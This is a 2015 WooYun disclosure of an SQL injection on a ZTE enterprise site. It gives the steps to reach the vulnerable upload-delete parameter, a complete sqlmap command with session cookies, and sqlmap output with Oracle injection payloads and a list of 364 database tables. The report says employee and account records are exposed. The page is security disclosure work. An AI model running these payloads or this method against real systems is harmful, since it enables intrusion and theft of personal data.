中兴某分站SQL注入可泄露海量数据 | wooyun-2015-096228| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096228

漏洞标题：中兴某分站SQL注入可泄露海量数据

漏洞作者：深度安全实验室

提交时间：2015-02-08 11:46

修复时间：2015-03-25 11:48

公开时间：2015-03-25 11:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-08：细节已通知厂商并且等待厂商处理中
2015-02-11：厂商已经确认，细节仅向厂商公开
2015-02-21：细节向核心白帽子及相关领域专家公开
2015-03-03：细节向普通白帽子公开
2015-03-13：细节向实习白帽子公开
2015-03-25：细节向公众公开

简要描述：

29万雇员信息和一万多账户信息

详细说明：

漏洞证明：

http://enterprise.zte.com.cn/

中兴通讯政企网，存在SQL注入，泄露大量数据。
注入的地方有必要详细说明一下，因为这是带cookie的，待会我的cookie失效了，怕厂商找半天都找不到请求是在哪抓的：
（1）注册网站账号后去渠道商注册

http://enterprise.zte.com.cn/en/partners/Prefecture/ChannelPartnerRegistration/ChannelRegistration/

（2）然后会看到有上传Business License 附件的地方，你首先上传一个图片上去，然后点delete删除该附件，会拦截到如下HTTP消息：

如上图所示，fileOid参数有问题。

sqlmap.py -u "http://enterprise.zte.com.cn/servlet/DeleteApplyUploadServlet?fileOid=26627" --cookie="JSESSIONID=3EABB825D14E82B82915688284B4030A;Hm_lvt_cb044cf8b50b36d639c455f864b7cfa9=1423296717; Hm_lpvt_cb044cf8b50b36d639c455f864b7cfa9=1423298053;_ga=GA1.3.972993370.1423296719; Hm_lvt_98a7f1bca4c6826d3079a7ea36f95f30=1423296821;Hm_lpvt_98a7f1bca4c6826d3079a7ea36f95f30=1423296821; _gat=1" --no-cast --dbs

ECC_TCM库，364张表：

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: fileOid
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace (original value)
    Payload: fileOid=(SELECT (CASE WHEN (5428=5428) THEN 26627 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
    Type: error-based
    Title: Oracle error-based - Parameter replace
    Payload: fileOid=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(101)||CHR(114)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (3379=3379) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(115)||CHR(113)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle time-based blind - Parameter replace (heavy queries)
    Payload: fileOid=(SELECT (CASE WHEN (5443=5443) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 5443 END) FROM DUAL)
---
web application technology: Servlet 2.4, Nginx, Tomcat 4.2.3.
back-end DBMS: Oracle
Database: ECC_TCM
[364 tables]
+--------------------------------+
| ABROAD_ADUIT_MAIL              |
| ABROAD_PROJECT_JOB             |
| ABROAD_PROJECT_JOBDETAIL       |
| ABROAD_REPORT_FEATURE          |
| ABROAD_STOCK_ADUIT             |
| ABROAD_STOCK_PROJECT           |
| ABROAD_STOCK_PROJECT_LOG       |
| ABROAD_STOCK_SALE_INFO         |
| ACTION_ADDRESS                 |
| AGENT                          |
| AGENT_LINKMAN                  |
| AGENT_OPER_LOG                 |
| AGENT_PRODUCT                  |
| APPROVAL_MAINTENANCE           |
| AREA_INFO_FROM_CRM             |
| AREA_WEEK_SCM_QUERY_HIS        |
| ATTENDANCE_EXCEPTION           |
| ATTENDANCE_POINT               |
| ATTENTION_SHOP                 |
| BRAND_SALES_STOCK              |
| BSL_LST_MOB_BISSUE             |
| BSL_LST_MOB_RECMSG             |
| BUF_MOB_RECMSG_TESTDATA        |
| BUF_MOB_REGION                 |
| CCG_BORAD_FOR_PRM              |
| CERTDELIEVE_DUPLICATE          |
| CHANNEL_RESAPPLY_FROM_CRM      |
| CHARGE_ASSIGN                  |
| CMS_CONTRACT_HEADERS_FOR_PRM   |
| CMS_CONTRACT_LINES_FOR_PRM     |
| CMS_DELIVER_LINES_FOR_PRM      |
| CMS_RECEIPT_APPLY_FOR_PRM      |
| COMPANY_NAME_CHANGE_LOG        |
| CONSTRUCT_MATERIEL             |
| CONSTRUCT_SHOP                 |
| CONSTRUCT_SHOP_EVA_MARK        |
| CONSTRUCT_SHOP_LOG             |
| CONSTRUCT_SHOP_MATERIEL        |
| CONTRAST_PROD_FEATURE          |
| CURRENT_NODE                   |
| CUST_TYPE_FROM_CRM             |
| DIM_MOB_TYPE                   |
| DOC_DIRECTORY                  |
| DOC_FROM_DIRECTORY             |
| DOMESTIC_STOCK_SALE_INFO       |
| E$_ECC_PRM_AREAINFO            |
| E$_ECC_PRM_CHANNEL_CUSTOMER    |
| E$_PRD_MANAGE_SALEPRD_RS       |
| E$_PRM_ODI_PRD_MANAGEUNIT_DIC  |
| ECC_CUST_AREA_INFO_TO_PRM      |
| ECC_PRM_AREAINFO               |
| ECC_PRM_CHANNEL                |
| ECC_PRM_CHANNEL_AUTH           |
| ECC_PRM_CHANNEL_CUSTOMER       |
| ECC_PRM_CHANNEL_HISTORY        |
| ECC_PRM_DATA_AUTH              |
| ECC_PRM_INDUSTRY               |
| ECC_PRM_PRODUCT                |
| ECC_PRM_PRODUCT_DEFAULT        |
| ECC_PRM_PRODUCT_RATE           |
| ECC_PRM_PROGRAM                |
| ECC_PRO_ROLE                   |
| ECC_TCM_DEPT                   |
| ECC_TRS_CHANNEL                |
| EVALUATE_ITEM                  |
| EVALUATE_TYPE                  |
| EXCEPTIONAL_MATERIEL           |
| EXCEPTION_DEAL_IDEA            |
| EXTENDED_ACCEPT_BILL           |
| FEATURE_MARK                   |
| FEELING_BUILD_PLAN             |
| FEELING_CONTRAST_PROD          |
| FEELING_FURNISHING             |
| FEELING_MATERIEL               |
| FLOW_LIST                      |
| FLOW_TEMPLATE                  |
| FORT_SHOP_APPLY_BILL           |
| FORT_SHOP_APP_LINKMAN          |
| FORT_SHOP_INVOICING            |
| FUNC_POINT                     |
| FUNC_POINT_AUTH                |
| FURNISHING_ACTION              |
| FURNISHING_ACTION_FEATURE      |
| FX_BILL_HEAD                   |
| FX_BILL_ROW                    |
| INSALES_INFO                   |
| LANGUAGE_TYPE                  |
| MAY_UP_OR_DOWN_SHOP            |
| MESSAGE_INFO                   |
| MESSAGE_SEND_CONFIG            |
| MES_SEQUENCE_NUMBER_TO_PRM     |
| MNG_DAT_CREATE_TIME            |
| MNG_SMC_ADJ                    |
| MNG_SMC_CONFIG                 |
| MNG_SMC_SENT                   |
| MNG_SQL_DEBUG                  |
| MNG_SYN_TASK                   |
| MNG_SYS_PARAM                  |
| MOBILE_CHANNEL_APPLY           |
| MOBILE_CHANNEL_RESAPPLY        |
| MOBILE_DATA_AUTH               |
| MOBILE_OPEN_DAY                |
| MOBILE_OPEN_MONTH              |
| MOBILE_OPEN_PARA_DETAIL        |
| MOBILE_OPEN_PARA_HEADER        |
| MOBILE_OPEN_WEEK               |
| MOBILE_OPEN_YEAR               |
| MSMC_DELIVERY_ORDER_TO_PRM     |
| MULTI_LANGUAGE                 |
| NODE_ROLE                      |
| ODS_LST_MOB_BC_TMP             |
| ODS_LST_MOB_BISSUE             |
| ODS_LST_MOB_BOX_TMP            |
| ODS_LST_MOB_RECMSG             |
| ODS_LST_MOB_RECMSG_TMP         |
| ODS_MOB_RECMSG_USER            |
| ODS_ZTE_MBC_BARCODE_IMEI       |
| OPERATORS_SALES_PROMOTION      |
| OVERTIME_BILL                  |
| OVERTIME_BILL_BACK             |
| PDM_PROD_AUTH                  |
| PDM_SMART_PHONE_TO_PSI         |
| PLAN_TABLE                     |
| PRD_MANAGE_SALEPRD_HISTORY     |
| PRD_MANAGE_SALEPRD_RS          |
| PRM_ACCOUNT_AUTH               |
| PRM_ACHIEVEMENT                |
| PRM_ARBITRATION                |
| PRM_BUSINESSRATE_DETAIL        |
| PRM_BUSINESSRETE_APPLY         |
| PRM_CALLBACKRECVINFOLOG        |
| PRM_CERTDELIEVE_IMPORT         |
| PRM_CERTIFICATE                |
| PRM_CERTIFICATE_APPLY          |
| PRM_CERTIFICATE_LOG            |
| PRM_CERTIFICATE_USE            |
| PRM_CERTIFICATION_LOCATION     |
| PRM_CERTIFI_INTER              |
| PRM_CERTIFI_LOG_INTER          |
| PRM_CERTIFI_RET_INTER          |
| PRM_CERTIFI_USE_INTER          |
| PRM_CERTUSE_IMPORT             |
| PRM_CERTUSE_IMPORT2            |
| PRM_CHANNEL_AGREEMENT          |
| PRM_CHANNEL_EDIT               |
| PRM_CHANNEL_ENGINEER           |
| PRM_CHANNEL_POSTINFO           |
| PRM_CHANNEL_RELATIONAPPLY      |
| PRM_CHANNEL_RESAPPLY           |
| PRM_CHANNEL_RESAPPLY_LOG       |
| PRM_CHANNEL_TASK               |
| PRM_CLUES_DETAILS              |
| PRM_CLUES_INFO                 |
| PRM_CLUES_SCORE                |
| PRM_CLUES_SCORE_FACTOR         |
| PRM_CLUES_SCORE_HISTORY        |
| PRM_CREDIT_RESAPPLY            |
| PRM_DBLOCK                     |
| PRM_DEF_RIGHT_FOR_UAM          |
| PRM_DOC_GRANT                  |
| PRM_ENGINEER_BIND_STAR_LEVEL   |
| PRM_ENGINEER_COMPANY           |
| PRM_ENGINEER_PRODUCT           |
| PRM_ENGINEER_SCORE             |
| PRM_ENGINEER_SERVICE           |
| PRM_FEATUREINFO_DETAIL         |
| PRM_FLOW_TYPE                  |
| PRM_GRANT_RIGHT_TMP_FOR_UAM    |
| PRM_GROUP                      |
| PRM_GROUP_CHANNEL              |
| PRM_GROUP_CUSTOM               |
| PRM_GROUP_MAILINFO             |
| PRM_INDUSTRY_CUSTOMER          |
| PRM_LOGIN_LOG                  |
| PRM_MAINTENANCE_INFO           |
| PRM_MAINTENANCE_RECORDS        |
| PRM_MOASENDINFOLOG             |
| PRM_MONTHLY_REPORT             |
| PRM_ODI_PRD_MANAGEUNIT_DIC     |
| PRM_ODI_PRD_MANAGE_PROD_RS     |
| PRM_ONLINE_BUY                 |
| PRM_ORDER                      |
| PRM_ORDERTASK                  |
| PRM_ORDER_CERTIFICATIONMONEY   |
| PRM_ORDER_ODI_FROM_CMS         |
| PRM_ORGAN_COUNTRY              |
| PRM_PDM_PRODUCT                |
| PRM_PRODUCT_AREA               |
| PRM_PRODUCT_DOC                |
| PRM_PRODUCT_DOC_LOG            |
| PRM_PRODUCT_DOC_OPERHISTORY    |
| PRM_PRODUCT_FEATUREINFO        |
| PRM_PRODUCT_MANAGER            |
| PRM_PRODUCT_TYPE_COMPARE       |
| PRM_PROJECT_APPLY              |
| PRM_QUESTIONNAIRE              |
| PRM_QUESTIONNAIRE_ANSWER       |
| PRM_QUESTIONNAIRE_BASEINFO     |
| PRM_QUESTIONNAIRE_CHANNEL      |
| PRM_QUESTIONNAIRE_CUSTOM       |
| PRM_QUESTIONNAIRE_OPT          |
| PRM_QUICKCODETYPE              |
| PRM_QUICKCODE_VALUES           |
| PRM_QUICKCODE_VALUES_NETSIGN   |
| PRM_RETURNPOINTINFO            |
| PRM_RETURNPOINTINFO_FROM_EXCEL |
| PRM_RETURNPOINTINFO_INTER      |
| PRM_RIGHT_LOG_FOR_UAM          |
| PRM_SIGN_UP_INFO               |
| PRM_STANDING_BOOK_INFO         |
| PRM_STANDING_BOOK_SALE         |
| PRM_START_LEVEL_APPLY          |
| PRM_STAR_LEVEL_CONFIG          |
| PRM_STAR_LEVEL_CONFIG_ITEM     |
| PRM_STAR_PRO_REGISTER          |
| PRM_TRAINING_INFO              |
| PRM_TRAINING_INFO_LOG          |
| PRM_USER_LOGIN                 |
| PRM_USER_SITE                  |
| PRM_WEBSERVICE_LOGIN           |
| PRODUCT_ANALYSIS_OVERVIEW      |
| PRODUCT_LINE_BIGTYPE           |
| PROMO_COST_STATISTIC           |
| PROVIDER                       |
| PSI_AMERICAN_CPFR              |
| PSI_AMERICAN_CPFR_2            |
| PSI_REPORT_ABNORMALFILLQUERY   |
| PSI_REPORT_DATAFILLCOUNT       |
| PSI_REPORT_HEADADUIT           |
| PSI_REPORT_PUSH                |
| PSI_REPORT_PUSH_SMALL          |
| PSI_REPORT_RISKOPPPRO          |
| PSI_REPORT_VIEW                |
| PSI_REPORT_WEEK                |
| PSI_REPORT_WEEKDELANAL         |
| PSI_REPORT_WEEKKEYPRO          |
| PSI_REPORT_WEEKPURSALEANAL     |
| PSI_REPORT_WEEKSALEANAL        |
| PSI_TEMP_TABLE                 |
| PURCHASE_CONTRACT_HEAD         |
| PURCHASE_CONTRACT_ROW          |
| PURCHASE_MODEL_SN              |
| REGION_AREA_RELATION           |
| REL_MOB_PRODUCT                |
| REL_MOB_REGION                 |
| REL_MOB_REGION_ADDR            |
| REPORT_AREA_WEEK_SCM           |
| REPORT_CONCERNFUL_FEA_SMC      |
| REPORT_CONSIGNMENT             |
| REPORT_CONSIGNMENT_BASE        |
| REPORT_DAY_SALES               |
| REPORT_DEPLOY                  |
| REPORT_DEPT_PROVINCE           |
| REPORT_FEATURE                 |
| REPORT_FEATURE_TEMP            |
| REPORT_FEA_DAY_SALES           |
| REPORT_FEA_WEEK_SALES          |
| REPORT_MATERIEL                |
| REPORT_POLICY                  |
| REPORT_PRODUCT_LINE            |
| REPORT_PROD_WEEK_SCM           |
| REPORT_SALERS                  |
| REPORT_SALES                   |
| REPORT_SALES_BASE              |
| REPORT_SALES_STOCK             |
| RETURNPOINT_FILEUPLOAD         |
| SALER_APPLY_BILL               |
| SALER_ATTENDANCE               |
| SALER_WORKLINE_SANP            |
| SALES_ACHIEVEMENT              |
| SALES_ACTION                   |
| SALES_ACTION_ADDRESS           |
| SALES_ACTION_DETAILS           |
| SALES_COMMISSION_BASIS         |
| SALES_COST                     |
| SALES_INFO_QUERY_HIS           |
| SALES_POLICY_INFO              |
| SALES_POST_BILL                |
| SALES_TASK                     |
| SALES_TASK_DETAILS             |
| SALE_BILL_HEAD                 |
| SALE_BILL_ROW                  |
| SALE_BILL_SN                   |
| SERVICE_CHARGES_BASIS          |
| SHOP_MATERIEL                  |
| SHOP_MATERIEL_UPT_REC          |
| SHOP_SALES_UPT_LOG             |
| SHOP_STATUS_UPT_LOG            |
| SNP_CHECK_TAB                  |
| SNP_PLAN_TABLE                 |
| SOFTWARE_VERSION               |
| SYNC_FROM_BESTTONE_TIME        |
| SYSTEM_RECORD                  |
| SYS_BLOCK_EXEC_RESULT          |
| SYS_ETL_PROCESS                |
| SYS_EXEC_RESULT                |
| SYS_EXP_DEFINE                 |
| TCM_ABROAD_PROJECT             |
| TCM_AREAINFO                   |
| TCM_CARRY_OVER                 |
| TCM_CHECKER_ATTENDANCE         |
| TCM_CONTRACT_DELIVERY          |
| TCM_COUNTRYINFO                |
| TCM_COUNT_CUSTOMER             |
| TCM_CUSTOMERINFO               |
| TCM_DEF_RIGHT_FOR_UAM          |
| TCM_EMOBILE_INFO               |
| TCM_EMPLOYEE                   |
| TCM_EMPLOYEE_GROUP             |
| TCM_EMPLOYEE_GROUP_DETAILS     |
| TCM_FEATUREINFO                |
| TCM_GRANT_RIGHT_TMP_FOR_UAM    |
| TCM_INOUT_STORE                |
| TCM_MAILS                      |
| TCM_MENU                       |
| TCM_MENU_URL                   |
| TCM_MOBILE_OPENED              |
| TCM_NO_FEATURE_INFO            |
| TCM_ODI_CLIENT_INFO_FROM_CMS   |
| TCM_ODI_CONSIGN_BASE_FROM_CMS  |
| TCM_ODI_CONSIGN_INFO_FROM_ERP  |
| TCM_ODI_EMPLOYEE_HASS_TMP      |
| TCM_ODI_EMPLOYEE_PASS_TMP      |
| TCM_ODI_HOL_DEPT               |
| TCM_ODI_HOL_DEPT_LEADER        |
| TCM_ODI_ISSUE_LINE_REL         |
| TCM_ODI_MTL_CATE_FROM_ERP      |
| TCM_ODI_MTL_TRANS_FROM_ERP     |
| TCM_ODI_PROD_INFO_FROM_ERP     |
| TCM_PRODUCT_INVENTORY          |
| TCM_PROD_BIGTYPE               |
| TCM_PROD_FEATURE               |
| TCM_QUICKCODETYPE              |
| TCM_QUICKCODE_VALUES           |
| TCM_REGION_INFO                |
| TCM_RIGHT_LOG_FOR_UAM          |
| TCM_ROLE                       |
| TCM_ROLE_AUTH                  |
| TCM_ROLE_MEMBER                |
| TCM_ROLE_MENU                  |
| TCM_SALESINFO                  |
| TCM_SHOPINFO                   |
| TCM_SHOP_ATTR                  |
| TCM_SHOP_SALESPEOPLE           |
| TCM_SHOP_TYPE                  |
| TCM_STOREFEELING               |
| TCM_STORESTAFF                 |
| TCM_STORE_NUM                  |
| TCM_USER_LOGIN                 |
| TCM_WORKLINE_SANP              |
| TEMP_ABROAD_STOCK              |
| TEMP_EXPORT_AREA               |
| TEMP_REPORT_MATERIEL           |
| TEMP_XU                        |
| TEST_AND_VERIFY                |
| TOUR_ISSUE                     |
| TOUR_ISSUE_TRACE               |
| TUNE_SHOP_HIS_INFO             |
| T_USERINFO                     |
| UNLOADING_FORECAST             |
| UPLOAD_FILE                    |
| UPLOAD_FILE_TYPE               |
| ZTESMS_RECVMSG_BAK             |
| ZTESMS_RECVMSG_DATA_CARD       |
+--------------------------------+

T_USERINFO表里面有1万多网站账户信息，取某些字段来看看：

TCM_EMPLOYEE表中有29万雇员信息，取几个关键字段看看：

这么多信息了，其他的表我就不去看了~

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-02-11 08:45

厂商回复：

感谢~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096228

漏洞标题：中兴某分站SQL注入可泄露海量数据

相关厂商：中兴通讯股份有限公司

漏洞作者：深度安全实验室

提交时间：2015-02-08 11:46

修复时间：2015-03-25 11:48

公开时间：2015-03-25 11:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096228

漏洞标题：中兴某分站SQL注入可泄露海量数据

相关厂商：中兴通讯股份有限公司

漏洞作者： 深度安全实验室

提交时间：2015-02-08 11:46

修复时间：2015-03-25 11:48

公开时间：2015-03-25 11:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-096228"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：深度安全实验室

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源深度安全实验室@乌云